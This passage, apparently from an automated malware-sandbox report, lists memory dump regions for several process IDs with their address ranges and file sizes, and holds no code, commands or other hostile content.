                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/3672-728-0x00000257DBB10000-0x00000257DBB20000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/3672-727-0x00000257DBB10000-0x00000257DBB20000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/3672-772-0x00000257F41A0000-0x00000257F41BA000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      104KB

                                                                                                                                                                                                    • memory/3672-746-0x00000257F3FE0000-0x00000257F3FEA000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      40KB

                                                                                                                                                                                                    • memory/3672-775-0x00000257F4190000-0x00000257F419A000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      40KB

                                                                                                                                                                                                    • memory/3672-773-0x00000257F4000000-0x00000257F4008000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      32KB

                                                                                                                                                                                                    • memory/3672-740-0x00000257F3F00000-0x00000257F3F1C000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      112KB

                                                                                                                                                                                                    • memory/3672-774-0x00000257F4180000-0x00000257F4186000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      24KB

                                                                                                                                                                                                    • memory/3672-770-0x00000257F3FF0000-0x00000257F3FFA000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      40KB

                                                                                                                                                                                                    • memory/4208-902-0x00007FF7AFCA0000-0x00007FF7B048F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      7.9MB

                                                                                                                                                                                                    • memory/4208-836-0x00007FF7AFCA0000-0x00007FF7B048F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      7.9MB

                                                                                                                                                                                                    • memory/4208-791-0x000001316F8C0000-0x000001316F8E0000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      128KB

                                                                                                                                                                                                    • memory/4208-789-0x000001316F870000-0x000001316F890000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      128KB

                                                                                                                                                                                                    • memory/4348-553-0x0000000004AD0000-0x0000000004AE0000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4348-556-0x0000000005D00000-0x0000000005D66000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      408KB

                                                                                                                                                                                                    • memory/4348-555-0x0000000006410000-0x0000000006432000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      136KB

                                                                                                                                                                                                    • memory/4348-554-0x0000000004BE0000-0x0000000004BEA000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      40KB

                                                                                                                                                                                                    • memory/4348-552-0x0000000004B10000-0x0000000004BA2000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      584KB

                                                                                                                                                                                                    • memory/4348-551-0x0000000004FD0000-0x0000000005574000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                    • memory/4348-550-0x0000000000030000-0x0000000000152000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1.1MB

                                                                                                                                                                                                    • memory/4536-641-0x0000000005420000-0x0000000005430000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4536-626-0x0000000007DF0000-0x0000000007E12000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      136KB

                                                                                                                                                                                                    • memory/4536-618-0x0000000007A60000-0x0000000007A7A000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      104KB

                                                                                                                                                                                                    • memory/4536-643-0x000000007F5B0000-0x000000007F5C0000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4536-587-0x0000000070240000-0x000000007028C000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      304KB

                                                                                                                                                                                                    • memory/4536-639-0x0000000005420000-0x0000000005430000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4536-638-0x0000000005420000-0x0000000005430000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4536-585-0x0000000005420000-0x0000000005430000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4536-620-0x000000007F5B0000-0x000000007F5C0000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4536-577-0x0000000005420000-0x0000000005430000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4536-582-0x0000000005420000-0x0000000005430000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4536-621-0x0000000007AD0000-0x0000000007ADA000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      40KB

                                                                                                                                                                                                    • memory/4536-622-0x0000000007D20000-0x0000000007DB6000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      600KB

                                                                                                                                                                                                    • memory/4536-625-0x0000000007CD0000-0x0000000007CD8000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      32KB

                                                                                                                                                                                                    • memory/4536-624-0x0000000007CE0000-0x0000000007CFA000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      104KB

                                                                                                                                                                                                    • memory/4632-771-0x0000000004B60000-0x0000000004B70000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4632-659-0x00000000001E0000-0x000000000034C000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1.4MB

                                                                                                                                                                                                    • memory/4632-679-0x0000000004B60000-0x0000000004B70000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/4632-711-0x0000000004B60000-0x0000000004B70000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/5012-778-0x00000167FE910000-0x00000167FE920000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/5012-750-0x00000167FE910000-0x00000167FE920000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/5012-749-0x00000167FE910000-0x00000167FE920000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB

                                                                                                                                                                                                    • memory/5012-760-0x00000167FE910000-0x00000167FE920000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      64KB